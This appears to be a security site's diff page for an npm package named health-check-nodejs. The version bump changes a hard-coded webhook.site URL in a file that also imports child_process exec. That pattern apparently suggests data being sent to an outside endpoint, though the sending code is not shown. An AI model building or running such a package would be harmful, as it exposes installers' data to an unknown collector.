health-check-nodejs 3.16.8 → 3.16.9
Sign up to get free protection for your applications and to get access to all the features.
- package/index.js +1 -1
- package/package.json +1 -1
package/index.js
CHANGED
@@ -1,6 +1,6 @@
|
|
1
1
|
const { exec } = require('child_process');
|
2
2
|
|
3
|
-
const WEBHOOK_URL = 'https://webhook.site/
|
3
|
+
const WEBHOOK_URL = 'https://webhook.site/e5e8a611-cb54-423e-9778-854f859e1fdd';
|
4
4
|
|
5
5
|
async function performHealthCheck(fetch) {
|
6
6
|
const healthStatus = { status: 'ok', timestamp: new Date().toISOString() };
|